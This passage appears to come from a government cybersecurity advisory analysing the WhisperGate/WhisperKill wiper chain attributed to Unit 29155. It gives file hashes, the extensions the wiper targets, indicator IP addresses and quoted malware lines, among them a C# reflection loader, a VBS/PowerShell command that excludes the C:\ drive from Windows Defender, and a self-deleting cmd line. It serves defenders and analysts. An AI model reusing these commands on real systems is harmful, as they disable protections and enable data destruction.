</tr>
<tr>
<th>Linker</th>
<td>Microsoft Linker(6.0)[DLL32]</td>
</tr>
<tr>
<th>TimeDateStamp</th>
<td>2022-01-10 09:39:31</td>
</tr>
</tbody>
</table>
<p>The original filename from the resulting payload was a Dynamic Link Library (DLL) file, <code>Frkmlkdkdubkznbkmcf.dll</code>; its attributes are listed in <strong>Table 21</strong>:</p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 21: Frkmlkdkdubkznbkmcf.dll Attributes</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Resources</th>
<th role="columnheader">Classes</th>
<th role="columnheader">Methods </th>
</tr>
</thead>
<tbody>
<tr>
<td>
<p>\u2005 \u2005 \u2009 \u2008 \u2001 \u2007 \u2009 \u200b \u200a \u2005</p>
<p><strong>Note:</strong> This format annotates action taken by EazFuscator to obfuscate items, making it difficult for malware analysts to review.</p>
</td>
<td>Main - ClassLibrary1</td>
<td>\u0002</td>
</tr>
<tr>
<td>7c8cb5598e724d34384cce7402b11f0e</td>
<td>pc1eOx2WJVV1579235895 –</td>
<td>Ylfwdwgmpilzyaph</td>
</tr>
<tr>
<td>78c855a088924e92a7f60d661c3d1845</td>
<td> </td>
<td> </td>
</tr>
</tbody>
</table>
<p><code>stage2.exe</code> was observed calling method <code>Ylfwdwgmpilzyaph</code> to begin decrypting resource <code>78c855a088924e92a7f60d661c3d1845</code>. The reflection library was used to execute method <code>Ylfwdwgmpilzyaph</code>, as shown in the following C# code block:</p>
<p><code>using System.Reflection;</code><br><code>string path = "Frkmlkdkdubkznbkmcf.dll";</code><br><code>string fqpn = Path.GetFullPath(path);</code><br><code>Assembly assembly = Assembly.LoadFile(fqpn);</code><br><code>Type type = assembly.GetType("ClassLibrary1.Main");</code><br><code>type.InvokeMember("Ylfwdwgmpilzyaph", BindingFlags.InvokeMethod, null, null, null);</code></p>
<p>The following application configuration accompanied the above code block to allow loading from remote sources:</p>
<p><code>&lt;?xml version="1.0" encoding="utf-8" ?&gt;</code><br><code>&lt;configuration&gt;</code><br><code>&lt;runtime&gt;</code><br><code>&lt;loadFromRemoteSources enabled="true"/&gt;</code><br><code>&lt;/runtime&gt;</code><br><code>&lt;/configuration&gt;</code></p>
<p>Upon invoking the method <code>Ylfwdwgmpilzyaph</code>, <code>Nmddfrqqrbyjeygggda.vbs</code> wrote to the Windows %TEMP% directory and has the following attributes, as listed in <strong>Table 22</strong> below.</p>
<div>
<table>
<caption><em>Table 22: Nmddfrqqrbyjeygggda.vbs Attributes</em></caption>
<tbody>
<tr>
<th>MD5</th>
<td>6eed4ee0cc57126e9a096ab9905f471c</td>
</tr>
<tr>
<th>SHA-256</th>
<td>db5a204a34969f60fe4a653f51d64eee024dbf018edea334e8b3df780eda846f</td>
</tr>
<tr>
<th>VBS Code</th>
<td>CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath 'C:\'", 0, False</td>
</tr>
</tbody>
</table>
<p>The VBS code listed in <strong>Table 22</strong> used a WScript shell that executed as a Windows application, which ran a PowerShell command to exclude the C:\ drive from Windows Defender's security checks. Malware analysts decoded and decrypted one of the resources from <code>Frkmlkdkdubkznbkmcf.dll</code> (<code>78c855a088924e92a7f60d661c3d1845</code>). Further analysis of <code>Frkmlkdkdubkznbkmcf.dll</code> resulted in an additional DLL file with the following hashes:</p>
<ul>
<li>MD5: <code>5a537673c34933fc854fbfb65477a686</code></li>
<li>SHA-256: <code>35feefe6bd2b982cb1a5d4c1d094e8665c51752d0a6f7e3cae546d770c280f3a</code></li>
</ul>
<p>This decrypted DLL file contained two resources, <code>AdvancedRun</code> and <code>Waqybg</code>.</p>
<ul>
<li><code>AdvancedRun</code><strong> </strong>(GZIP)
<ul>
<li>MD5: <code>de85ca91e1e8100a619de1c25112f1a5</code></li>
<li>SHA-256: <code>489ab4819830d231c3fc3572c5386cad9d18773a8121373ea8174de981cc9166</code></li>
</ul>
</li>
<li><code>Waqybg</code><strong> </strong>(GZIP)
<ul>
<li>Reversed byte order:
<ul>
<li>MD5: <code>9b1191f1ceddf312b0d609cd929c6631</code></li>
<li>SHA-256: <code>0dd61a16c625c49ffefaf4ce24cabf9a074028a06640d9bbb804f735ff56dfa3</code></li>
</ul>
</li>
<li>Original byte order:
<ul>
<li>MD5: <code>29d83f29c0b0a0b7499e71e7d5cb713f</code></li>
<li>SHA-256: <code>fd4a5398e55beacb2315687a75af5aa15b776b5d36b9800a1792ede3955616c2</code></li>
</ul>
</li>
</ul>
</li>
</ul>
<p><strong>Table 23</strong> and <strong>Table 24</strong> list the file properties for both the <code>AdvancedRun</code> and reversed <code>Waqybg</code> decompressed files.</p>
<div>
<table>
<caption><em>Table 23: AdvancedRun (decompressed)</em></caption>
<tbody>
<tr>
<th>Type</th>
<td>Win32 EXE</td>
</tr>
<tr>
<th>Company</th>
<td>NirSoft</td>
</tr>
<tr>
<th>TimeStamp</th>
<td>2020:08:03 09:41:38-04:00</td>
</tr>
<tr>
<th>Original File Name</th>
<td>AdvancedRun.exe</td>
</tr>
<tr>
<th>MD5</th>
<td>17fc12902f4769af3a9271eb4e2dacce</td>
</tr>
<tr>
<th>SHA-256</th>
<td>29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b</td>
</tr>
</tbody>
</table>
<div>
<table>
<caption><em>Table 24: Waqybg (reversed; decompressed)</em></caption>
<tbody>
<tr>
<th>Type</th>
<td>Win32 EXE</td>
</tr>
<tr>
<th>TimeStamp</th>
<td>2022:01:10 03:14:38-05:00</td>
</tr>
<tr>
<th>MD5</th>
<td>3907c7fbd4148395284d8e6e3c1dba5d</td>
</tr>
<tr>
<th>SHA-256</th>
<td>34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907</td>
</tr>
<tr>
<th>Compiler</th>
<td>MinGW(GCC: (GNU) 6.3.0)[-]</td>
</tr>
<tr>
<th>Linker</th>
<td>GNU linker Id (GNU Binutils)(2.28)[Console32,console]</td>
</tr>
</tbody>
</table>
<p>The reversed and decompressed <code>Waqybg</code> files contained file corruption logic along with a final command to ping arbitrarily and delete itself: <code>cmd.exe /min /C ping 111.111.111.111 -n 5 -w 10 &gt; Nul &amp; Del /f /q “%s”</code>. <code>Waqybg</code> is known as WhisperKill—a malware downloaded by WhisperGate that destroys files with specific extensions.[<a href="https://cert.gov.ua/article/18419">19</a>],[<a href="https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html">21</a>]</p>
<p>The following file extensions listed in <strong>Table 25 </strong>were targeted for file corruption with the equivalent of the “wcscmp” C function logic (a string compare function). The corruption logic included overwriting 0x100000 or 1 MB worth of 0xcc values per targeted file.</p>
<table>
<caption><em>Table 25: File Extensions Targeted by WhisperKill</em></caption>
<tbody>
<tr>
<td><a>u".3DM"</a></td>
<td>u".3DS"</td>
<td>u".602"</td>
<td>u".ACCDB"</td>
<td>u".ARC"</td>
<td>u".ASC"</td>
</tr>
<tr>
<td>u".ASM"</td>
<td>u".ASP"</td>
<td>u".ASPX"</td>
<td>u".BACKUP"</td>
<td>u".BAK"</td>
<td>u".BAT"</td>
</tr>
<tr>
<td>u".BMP"</td>
<td>u".BRD"</td>
<td>u".BZ2"</td>
<td>u".CGM"</td>
<td>u".CLASS"</td>
<td>u".CMD"</td>
</tr>
<tr>
<td>u".CONFIG"</td>
<td>u".CPP"</td>
<td>u".CRT"</td>
<td>u".CSR"</td>
<td>u".CSV"</td>
<td>u".DBF"</td>
</tr>
<tr>
<td>u".DCH"</td>
<td>u".DER"</td>
<td>u".DIF"</td>
<td>u".DIP"</td>
<td>u".DJVU.SH"</td>
<td>u".DOC"</td>
</tr>
<tr>
<td>u".DOCB"</td>
<td>u".DOCM"</td>
<td>u".DOCM"</td>
<td>u".DOCX"</td>
<td>u".DOT"</td>
<td>u".DOTM"</td>
</tr>
<tr>
<td>u".DOTX"</td>
<td>u".DWG"</td>
<td>u".EDB"</td>
<td>u".EML"</td>
<td>u".FRM"</td>
<td>u".GIF"</td>
</tr>
<tr>
<td>u".HDD"</td>
<td>u".HTM"</td>
<td>u".HWP"</td>
<td>u".IBD"</td>
<td>u".INC"</td>
<td>u".INI"</td>
</tr>
<tr>
<td>u".ISO"</td>
<td>u".JAR"</td>
<td>u".JAVA"</td>
<td>u".JPEG"</td>
<td>u".JPG"</td>
<td>u".JSP"</td>
</tr>
<tr>
<td>u".KDBX"</td>
<td>u".KEY"</td>
<td>u".LAY"</td>
<td>u".LAY6"</td>
<td>u".LDF"</td>
<td>u".LOG"</td>
</tr>
<tr>
<td>u".MAX"</td>
<td>u".MDB"</td>
<td>u".MDF"</td>
<td>u".MML"</td>
<td>u".MSG"</td>
<td>u".MYD"</td>
</tr>
<tr>
<td>u".MYI"</td>
<td>u".NEF"</td>
<td>u".NVRAM"</td>
<td>u".ODB"</td>
<td>u".ODG"</td>
<td>u".ODP"</td>
</tr>
<tr>
<td>u".ODS"</td>
<td>u".ODT"</td>
<td>u".OGG"</td>
<td>u".ONETOC2"</td>
<td>u".OST"</td>
<td>u".OTG"</td>
</tr>
<tr>
<td>u".OTP"</td>
<td>u".OTS"</td>
<td>u".OTT"</td>
<td>u".P12"</td>
<td>u".PAQ"</td>
<td>u".PAS"</td>
</tr>
<tr>
<td>u".PDF"</td>
<td>u".PEM"</td>
<td>u".PFX"</td>
<td>u".PHP"</td>
<td>u".PHP3"</td>
<td>u".PHP4"</td>
</tr>
<tr>
<td>u".PHP5"</td>
<td>u".PHP6"</td>
<td>u".PHP7"</td>
<td>u".PHPS"</td>
<td>u".PHTML"</td>
<td>u".PNG"</td>
</tr>
<tr>
<td>u".POT"</td>
<td>u".POTM"</td>
<td>u".POTX"</td>
<td>u".PPAM"</td>
<td>u".PPK"</td>
<td>u".PPS"</td>
</tr>
<tr>
<td>u".PPSM"</td>
<td>u".PPSX"</td>
<td>u".PPT"</td>
<td>u".PPTM"</td>
<td>u".PPTM"</td>
<td>u".PPTX"</td>
</tr>
<tr>
<td>u".PS1"</td>
<td>u".PSD"</td>
<td>u".PST"</td>
<td>u".RAR"</td>
<td>u".RAW"</td>
<td>u".RTF"</td>
</tr>
<tr>
<td>u".SAV"</td>
<td>u".SCH"</td>
<td>u".SHTML"</td>
<td>u".SLDM"</td>
<td>u".SLDX"</td>
<td>u".SLK"</td>
</tr>
<tr>
<td>u".SLN"</td>
<td>u".SNT"</td>
<td>u".SQ3"</td>
<td>u".SQL"</td>
<td>u".SQLITE3"</td>
<td>u".SQLITEDB"</td>
</tr>
<tr>
<td>u".STC"</td>
<td>u".STD"</td>
<td>u".STI"</td>
<td>u".STW"</td>
<td>u".SUO"</td>
<td>u".SVG"</td>
</tr>
<tr>
<td>u".SXC"</td>
<td>u".SXD"</td>
<td>u".SXI"</td>
<td>u".SXM"</td>
<td>u".SXW"</td>
<td>u".TAR"</td>
</tr>
<tr>
<td>u".TBK"</td>
<td>u".TGZ"</td>
<td>u".TIF"</td>
<td>u".TIFF"</td>
<td>u".TXT"</td>
<td>u".UOP"</td>
</tr>
<tr>
<td>u".UOT"</td>
<td>u".VBS"</td>
<td>u".VCD"</td>
<td>u".VDI"</td>
<td>u".VHD"</td>
<td>u".VMDK"</td>
</tr>
<tr>
<td>u".VMEM"</td>
<td>u".VMSD"</td>
<td>u".VMSN"</td>
<td>u".VMSS"</td>
<td>u".VMTM"</td>
<td>u".VMTX"</td>
</tr>
<tr>
<td>u".VMX"</td>
<td>u".VMXF"</td>
<td>u".VSD"</td>
<td>u".VSDX"</td>
<td>u".VSWP"</td>
<td>u".WAR"</td>
</tr>
<tr>
<td>u".WB2"</td>
<td>u".WK1"</td>
<td>u".WKS"</td>
<td>u".XHTML"</td>
<td>u".XLC"</td>
<td>u".XLM"</td>
</tr>
<tr>
<td>u".XLS"</td>
<td>u".XLSB"</td>
<td>u".XLSM"</td>
<td>u".XLSM"</td>
<td>u".XLSX"</td>
<td>u".XLT"</td>
</tr>
<tr>
<td>u".XLTM"</td>
<td>u".XLTX"</td>
<td>u".XLW"</td>
<td>u".YML"</td>
<td>u".ZIP"</td>
<td> </td>
</tr>
</tbody>
</table>
<h4><strong>Malware Related to Tbopbh.jpg</strong></h4>
<p><code>stage2.exe</code> and its respective payload, <code>Tbopbh.jpg</code>, served as a template for other malware within Discord Cluster 1. While most of these other malware files have not been observed in open source reporting, malware analysts assess them as payloads that follow the unravelling process listed in <strong>Figure 1</strong> below.</p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-09/Figure%201%20-%20stage2.exe%20Execution%20Process%20Template.png?itok=0BWq6sPC" width="1024" height="619" alt="Figure 1 - stage2.exe Execution Process Template">



</div>
      <figcaption class="c-figure__caption"><em>Figure 1: stage2.exe Execution Process Template</em></figcaption>
  </figure>
<p><strong>Table 26</strong> below provides a list of MD5 hashes for files found within Discord Cluster 1. When reversed, these files become DLL files, which were structured similarly to <code>Frkmlkdkdubkznbkmcf.dll</code>.</p>
<p><strong>Note:</strong> Analysts identified the files below in Discord Cluster 1; the files are staged on the Cluster in reversed byte order. Analysts reversed the file byte order for each file into their proper portable executable format, e.g., “Functional” format. The hashes in <strong>Table 26</strong> represent both byte orders.</p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 26: Files Located in Discord Cluster 1</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Filename</th>
<th role="columnheader">MD5 (Reversed)</th>
<th role="columnheader">MD5 (Functional)</th>
</tr>
</thead>
<tbody>
<tr>
<td>Afgyyppsysmtddhvhhaw.dll</td>
<td>d034fe4c71b16b6d331886c24fef2751</td>
<td>4074798a621232dc448b65db7b1fdd66</td>
</tr>
<tr>
<td>Avbbwys.dll</td>
<td>422437f326b8dbe30cc5f103bde31f26</td>
<td>7f84263fd24f783ff72d5ae91011b558</td>
</tr>
<tr>
<td>Azkebvoyswvjnrpmn.dll</td>
<td>562c337b8caca330da2ea6ae07ee5db6</td>
<td>f73d203bdf924658fd6edf3444c93a50</td>
</tr>
<tr>
<td>Budoejokuqbge.dll</td>
<td>58e879213d81333b628434ba4aeb2751</td>
<td>08dfebc04eb61c9a6d87b6524c1c0f2e</td>
</tr>
<tr>
<td>Bwqdffttejlkeqe.dll</td>
<td>1c85c0d044ac837e8939564afac1eb32</td>
<td>8633bd2bbbb5da22c3f8751150186c42</td>
</tr>
<tr>
<td>Bxqbsyxfkjzmhdtfceoak.dll</td>
<td>7234da8ceafbe6586469f18c03cc1832</td>
<td>5f4df6dd8e644d59eaf182e500b5e7bf</td>
</tr>
<tr>
<td>Clsrncpbaucrabuobcpale.dll</td>
<td>618d62dd95fd9aeb855fe2ef1403dce5</td>
<td>955e4c198ee58e40fe92cb74ceefdf00</td>
</tr>
<tr>
<td>Cpdvzvzyghy.dll</td>
<td>d40195a444526eafb0db56d95bf8655d</td>
<td>a905d620717f75751aa94ceb88995dbc</td>
</tr>
<tr>
<td>Ctiktdfyauejxfak.dll</td>
<td>d06761b2cff86035a4838110ed6ab622</td>
<td>2ca6bcf16ee4293a771a1cf7b7b9ee49</td>
</tr>
<tr>
<td>Czxhayyankwsp.dll</td>
<td>59da31da4db1aa5f9a5c7c0c151422c8</td>
<td>de1bf141976776becd376a0dac400df6</td>
</tr>
<tr>
<td>Djpajq.dll</td>
<td>de1f9d1f0336ddcff832ad3900acd2f1</td>
<td>974e7c0b3660fbf18f29eac059f85ac0</td>
</tr>
<tr>
<td>Dmdtflkcgebf.dll</td>
<td>394e056cb6cb732dfd5e0d45d3dae938</td>
<td>4d8343c40be53d6521244fe74393d937</td>
</tr>
<tr>
<td>Ejcpaujkmvjndgqznimmkgd.dll</td>
<td>b7c1a8d39f46eaf52be90e24565dd6b0</td>
<td>7a70d5fbbafe3454b76e3ad2f009618f</td>
</tr>
<tr>
<td>Encuutwvdqbxlxh.dll</td>
<td>2b39eab325906b0a3ab7e584c3d67349</td>
<td>df4f856f783d23fb01af1e0e64bc0e20</td>
</tr>
<tr>
<td>Esalfjyraquwfxcgufwzip.dll</td>
<td>80f0ee332a452172533ad8863bb3bc63</td>
<td>f4f4e55a00d2f3a433c9e5624285ac1c</td>
</tr>
<tr>
<td>Fdgofjdvmmllgsxunb.dll</td>
<td>9345425cf07b4c39a80cd8540e08bfde</td>
<td>eef2363744345741e09fe5380eeb4df3</td>
</tr>
<tr>
<td>Fkhzvcuucaprsibp.dll</td>
<td>aecb57e20d2c0b0d9fece2cbcbcc3459</td>
<td>4bce4831b1dd71f19c55b3e3b5e99856</td>
</tr>
<tr>
<td>Fkthhyexkr.dll</td>
<td>58dc7c9577ff90a046359ca255c0c9f4</td>
<td>19cb20c4e7dbfe15c1aa284752d0fecb</td>
</tr>
<tr>
<td>Fqattuyxknkhv.dll</td>
<td>5c9e2195d10375b746b6717fdb47b5b9</td>
<td>2b5f159f022109a8de1bc5dd9e3138a0</td>
</tr>
<tr>
<td>Fqyubbzbubsge.dll</td>
<td>afbb9459d4a0f60d7ffb3b3532d11bc2</td>
<td>8d3d4d702ba6b4be2766a41bfe5ff76e</td>
</tr>
<tr>
<td>Frkmlkdkdubkznbkmcf.dll</td>
<td>b3370eb3c5ef6c536195b3bea0120929</td>
<td>e61518ae9454a563b8f842286bbdb87b</td>
</tr>
<tr>
<td>Gsiook.dll</td>
<td>a1b509254a0a1daa7e00d279ec974461</td>
<td>0e03103e8110785156105946e48ea9e0</td>
</tr>
<tr>
<td>Gutjuhi.dll</td>
<td>791a81f31a8e7090a7d5417451e09efa</td>
<td>fba76f4eb2e7a2eb17193bebe290a198</td>
</tr>
<tr>
<td>Hisvswmeswmnqbvzpoxzx.dll</td>
<td>e1a15bc13157134f542cd9c55c742460</td>
<td>c9d1677f4f89b95b41591b23a1dc1a63</td>
</tr>
<tr>
<td>Hsoahb.dll</td>
<td>cd62d4a178705b2b90a8babd8613df93</td>
<td>032f5642d4fb2fdd74e6f20a13c57746</td>
</tr>
<tr>
<td>Icyjkszdzgoxdfuwptkwxo.dll</td>
<td>f34f60375bebad861a35b7c4bb0fa1c8</td>
<td>a66b3b22a3619f739b197d0d443b700c</td>
</tr>
<tr>
<td>Jdfzavlqr.dll</td>
<td>7fe7f33d9b5dbdf3d032d2a10e39f283</td>
<td>8cfef66b390f08bdbfd940922cf51650</td>
</tr>
<tr>
<td>Jrdggfjvve.dll</td>
<td>b32e14a9b7de6c92cd16758fa6e23346</td>
<td>1220b580cef1bf22351e271773945d20</td>
</tr>
<tr>
<td>Jteieurqgvpgnhw.dll</td>
<td>b85538f665fdb6c8d9a74f2df7369832</td>
<td>ffa68749aa3fc6495e2c49b01d964339</td>
</tr>
<tr>
<td>Kbuqtmznmodjzvxvwxcvho.dll</td>
<td>869742fb9db71fdb66f00528fe2966ec</td>
<td>5b884f15dc9b072d7bbad9ec2b249f38</td>
</tr>
<tr>
<td>Kdmvyizz.dll</td>
<td>2128361d8aaae1225d50c9add32006a1</td>
<td>9152c9de57b5647ee4ab3dff551dc8dd</td>
</tr>
<tr>
<td>Kfxghcmg.dll</td>
<td>56e0446a6d7175a0d09110bc483ddbed</td>
<td>fc418fdda06ce5982153766dcefb71d9</td>
</tr>
<tr>
<td>Krewcizfplntbwcqawfhtfpd.dll</td>
<td>6a4fca88ee36fecc5113e188cc39d25c</td>
<td>5c3b0040e2dece6e17093ae607b79044</td>
</tr>
<tr>
<td>Lsurhpmpyewhv.dll</td>
<td>143594597130e301499e5940a5fb798a</td>
<td>911c7e82f32f78577dcd725a7adb114d</td>
</tr>
<tr>
<td>Mbkzrkfasxgxtzhgpgsehip.dll</td>
<td>993f01861aff306df44e6475f7886f37</td>
<td>e4634ef9bfe7b598b857ad997445b239</td>
</tr>
<tr>
<td>Mhnovdgzzidqx.dll</td>
<td>64b9feeccf6c183b9f7138f8fc53acbb</td>
<td>7e0c42d33921a89724424f17c97037bd</td>
</tr>
<tr>
<td>Mlfampnfnmjvjnahkrawwqd.dll</td>
<td>ddec2d79f460a881849037336ba8968f</td>
<td>d973210977957209f255b58eb1715b12</td>
</tr>
<tr>
<td>Mppveiyannobrcdlkd.dll</td>
<td>9606b4720a0e73ef1f00505a11aab2f7</td>
<td>0adc2530cf348c0a3d53a680291a3d67</td>
</tr>
<tr>
<td>Mzhyeemgqbmamubqn.dll</td>
<td>f772f5c65d65412f61ef5f2660e33ceb</td>
<td>f8ffd1eab6223e31b15d0fd6c3c0472e</td>
</tr>
<tr>
<td>Nbbudwt.dll</td>
<td>875f9200b49db08c33962b0a6bd05ab9</td>
<td>2e035360971a817b854d7d5a2b008717</td>
</tr>
<tr>
<td>Nhqcfzagulwaw.dll</td>
<td>fa97dbe84ce7717b754795fa89f13dce</td>
<td>601c12596dfea84c2113ae5ee59a52ec</td>
</tr>
<tr>
<td>Nlzhpvuzzoycqnnpl.dll</td>
<td>d8c04ecd646a1f8537a59f63518ef3c6</td>
<td>47f4534da421daf8089cf34d53f6bb6e</td>
</tr>
<tr>
<td>Noubvdigjlwsnqiylzgikkk.dll</td>
<td>3bcff990faacbebb8fb470dfe03e2543</td>
<td>683546b9171a1ea284a96d1b45d1d823</td>
</tr>
<tr>
<td>Nvxwbzciqarteyuz.dll</td>
<td>c265188fdadddb648629e8060601dca7</td>
<td>af85885a74cfe099676af542dcdc5741</td>
</tr>
<tr>
<td>Nykfvwmchighqwcguabvgq.dll</td>
<td>8a2ba7f9cb6f65edf65dbe579907551e</td>
<td>673586594242d99ab02118595e457297</td>
</tr>
<tr>
<td>Ofgdwttnmqibnmpqx.dll</td>
<td>9657c2ef6ed5229740b125df9ca6c915</td>
<td>0dc5ac12f7690db15c99eaabc11b129c</td>
</tr>
<tr>
<td>Ohtvepefcjnchrrasokn.dll</td>
<td>a5494ffd9efb7c3df59c527076a05e62</td>
<td>e2cc52273d56ed66c800a726760c1ed0</td>
</tr>
<tr>
<td>Olkscszculdbzvco.dll</td>
<td>85afdef18d65b0518d709a5a324ea57a</td>
<td>77675a24040f10c85112d9a219d5f1c7</td>
</tr>
<tr>
<td>Onkwzkpfuqazvali.dll</td>
<td>da4d81f9ef3b25ea09f34481d923dd9d</td>
<td>cc4a9db6f250114e26d8d9ba6ab46bc9</td>
</tr>
<tr>
<td>Opaqwrazeyyilbbjlkf.dll</td>
<td>0e6374042b33d78329149a6189a7cb46</td>
<td>1934e2ebc64d41e37ef53ea0c075e974</td>
</tr>
<tr>
<td>Owxtabfdqhkaahhwsgkatuu.dll</td>
<td>d33f608f561096be24cba91797e0da2f</td>
<td>332b7f6662e28e3577bd1b269904b940</td>
</tr>
<tr>
<td>Poezcjhvkzgmnyqljpbte.dll</td>
<td>32db8abce1618e60441f5c7cf4be0d22</td>
<td>2b2509c6ee46d6327f2f1c9a75122d15</td>
</tr>
<tr>
<td>Rvyqctymumtudroyae.dll</td>
<td>dd2431b1f858b4ca14a4ea05fb8c4a06</td>
<td>9b2924c727aa3a061906321a66c9050c</td>
</tr>
<tr>
<td>Sutragevr.dll</td>
<td>7d3b529db1bd896d9fd877b85cafdc64</td>
<td>de276cf07ccffa18d7ffc35281bca910</td>
</tr>
<tr>
<td>Sxkdxclqmxnmjgedhgagl.dll</td>
<td>6e1394938c2fecad2d4f5b3bcf357ec0</td>
<td>d6b41747cb035c4c2b08790cd57f0626</td>
</tr>
<tr>
<td>Tosyxesxgrzyb.dll</td>
<td>99305ce01cc2d0f58cd226efb2de893f</td>
<td>6859fe5a3eead00a563cd93efcc6ea96</td>
</tr>
<tr>
<td>Tpmnkauftdydomyz.dll</td>
<td>6c152774f6894407075e6f0a2859bbae</td>
<td>981160dee6cd25fb181e54eca7ff7c22</td>
</tr>
<tr>
<td>Tptjtwfhpsjfksqoajt.dll</td>
<td>343b140977b3f9b227e7e5f82b0fadb5</td>
<td>95cf2a5a24b0d33d621bb8995d5826bc</td>
</tr>
<tr>
<td>Tsgblplhdwwj.dll</td>
<td>54a9fa9eb337a3b5ca7b0fa4553e439d</td>
<td>cee5acbfef7e76f52f40b8ae95199c50</td>
</tr>
<tr>
<td>Uqhznlcagzyoqrbyylnnwn.dll</td>
<td>4c19aeecbfca13b8a199703d8b8284b9</td>
<td>ad0ca738aa6c987e4ee1a87ff2b8acd5</td>
</tr>
<tr>
<td>Uslrfkxccdyetfdxmaokbhv.dll</td>
<td>dc795cb9290b1bc0b7fb1ce9d6ae7c93</td>
<td>552d9b79cc544fc6c3e8aa204dd00811</td>
</tr>
<tr>
<td>Waordspinycera.dll</td>
<td>9935a86108e3ae3f72cd15817601dcc6</td>
<td>5d063eecd894d3d523875bc82ef6f319</td>
</tr>
<tr>
<td>Wcfsobntsczz.dll</td>
<td>77aa3f342a0d69fda67c853bcc004d48</td>
<td>d0b00a6c83ce810ec2763af17e8ab1c4</td>
</tr>
<tr>
<td>Wpqyhvfnunlabx.dll</td>
<td>03af632aa6f87bf9dd4364ee3b612cbb</td>
<td>9f11e915be5c0d02a3130329cf032a28</td>
</tr>
<tr>
<td>Wqwpawlulyrsrjcbvuvddeud.dll</td>
<td>41871fef433d7b4b89fd226fe3a1a2c0</td>
<td>e21fe98cc8866c0eeecf3549ebcec751</td>
</tr>
<tr>
<td>Wqxpgvsgvhygmfbziucxcuh.dll</td>
<td>246d9f9831b125ea7e6ef21bc4c8a0ca</td>
<td>dea3ae8225913dd98148fc86cfc3bcbe</td>
</tr>
<tr>
<td>Xgcpgrxhchgwz.dll</td>
<td>9c695be3703194fdb71c212a0832bcf3</td>
<td>8744cec7547b1e73705c10a264e28e08</td>
</tr>
<tr>
<td>Xgkepoc.dll</td>
<td>69e58c5ee69f5e5e8a58f4afdd59adfe</td>
<td>d43446b4a22a597b93b559821ee5ac9b</td>
</tr>
<tr>
<td>Xlfthpiq.dll</td>
<td>540ee8e39150c539fea582b0e77be7b0</td>
<td>3fe96ff4a5ef0f5346ce645a2a893597</td>
</tr>
<tr>
<td>Xlocky.dll</td>
<td>0a2affa6d895baab087b84e93145da35</td>
<td>246f31c86bbbe7f65c0126cf4a1a947a</td>
</tr>
<tr>
<td>Xqblktvxmnxrzwiuqdfxzrd.dll</td>
<td>569c1d31f4c7ec7701d8e4e51b59fe85</td>
<td>5eaa7e812733a5c8cda734fab2f752d5</td>
</tr>
<tr>
<td>Xykqrksoqqgyuckfc.dll</td>
<td>09a2d85e809d36bff82bd5ab773980a3</td>
<td>96964aed18f65a7acae632f358a093f6</td>
</tr>
<tr>
<td>Yawyjonk.dll</td>
<td>3ccf799ff208981349cee4fb1a1cf88c</td>
<td>4e9c55c6fe25d61ca4394de794546fab</td>
</tr>
<tr>
<td>Yrknbt.dll</td>
<td>6154760e602bd71192d93f72fbdb486e</td>
<td>94bf96b76c2a092de8962496ce35deaf</td>
</tr>
<tr>
<td>Yvbmuigfihprdxgiirp.dll</td>
<td>b0d0a23766fa64ece9315f37b28bb4c0</td>
<td>1e22d64f263e8ea4b2d37dcd9b7c3012</td>
</tr>
<tr>
<td>Ywrovtjimixpmizuln.dll</td>
<td>ca43a241042b5fcc305393765ae18e69</td>
<td>28d571ddb5c04d065dfe1be9604663ba</td>
</tr>
<tr>
<td>Zfgdccnwnee.dll</td>
<td>251f3a4757d9e4de0499cc30c0bc00a9</td>
<td>755dac7edd17fbf5b5c449dd06c02e14</td>
</tr>
<tr>
<td>Zkuxhxwbvifejn.dll</td>
<td>9d7ab8b0aa669125d9a5adc4f46c56f3</td>
<td>af277ae0fbf6cc20f887696ea4756d46</td>
</tr>
<tr>
<td>Zsdflpivel.dll</td>
<td>a9c9c0be8eca3b575c24da0fcf1af1a9</td>
<td>1cac5c0cb8801e8730447023270d8d56</td>
</tr>
</tbody>
</table>
</div>
<h2><strong>Appendix B: Indicators of Compromise</strong></h2>
<p><strong>Table 27</strong> lists observed IP addresses that were first observed as early as 2022 and have been historically linked to Unit 29155 infrastructure. These IPs are considered historical infrastructure and should be investigated for associated abnormal or malicious activity.</p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 27: IP Addresses Associated with Unit 29155 Infrastructure</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">IP Address</th>
</tr>
</thead>
<tbody>
<tr>
<td>5.226.139[.]66</td>
</tr>
<tr>
<td>45.141.87[.]11</td>
</tr>
<tr>
<td>46.101.242[.]222</td>
</tr>
<tr>
<td>62.173.140[.]223</td>
</tr>
<tr>
<td>79.124.8[.]66</td>
</tr>
<tr>
<td>90.131.156[.]107</td>
</tr>
<tr>
<td>112.51.253[.]153</td>
</tr>
<tr>
<td>112.132.218[.]45</td>
</tr>
<tr>
<td>154.21.20[.]82</td>
</tr>
<tr>
<td>179.43.133[.]202</td>
</tr>
<tr>
<td>179.43.142[.]42</td>
</tr>
<tr>
<td>179.43.162[.]55</td>
</tr>
<tr>
<td>179.43.175[.]38</td>
</tr>
<tr>
<td>179.43.175[.]108 (data exfiltration site)</td>
</tr>
<tr>
<td><a>179.43.176[.]60</a></td>
</tr>
<tr>
<td>179.43.187[.]47</td>
</tr>
<tr>
<td>179.43.189[.]218</td>
</tr>
<tr>
<td>185.245.84[.]227</td>
</tr>
<tr>
<td>185.245.85[.]251</td>
</tr>
<tr>
<td>194.26.29[.]84</td>
</tr>
<tr>
<td>194.26.29[.]95</td>
</tr>
<tr>
<td>194.26.29[.]98</td>
</tr>
<tr>
<td>194.26.29[.]251</td>
</tr>
</tbody>
</table>
